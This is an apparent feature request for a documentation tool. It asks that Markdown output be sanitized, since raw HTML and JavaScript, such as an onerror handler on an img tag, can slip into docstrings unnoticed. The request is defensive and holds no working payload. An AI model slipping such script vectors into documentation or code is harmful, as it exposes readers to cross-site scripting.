Is your change request related to a problem? Please describe.

I recently discovered in this mind-bending issue that most Markdown implementations don't sanitize their output, with Python-Markdown being no exception. This means that (contrary to popular belief), Markdown text cannot be trusted to be safe.

While developers should be careful to only accept merges after thoroughly reviewing code, there are lots of ways to subtlely embed JS into documents, which can be easily overlooked (eg using onerror in an <img> tag). I cannot think of any non-malicious to embed executing JS code within documentation markdown, when it is so much easier to bundle additional JS using mkdocs (which reviewers would be much more suspicious of, and therefore much more careful of).

Describe the solution you'd like

Sanitize the Markdown output within documentation to prevent executable JS code from being embedded in the output. Perhaps mozilla/bleach can be used.

Describe alternatives you've considered

Do nothing, but document that docstrings cannot be blindly trusted to be safe, as JS can be embedded within them.

Additional context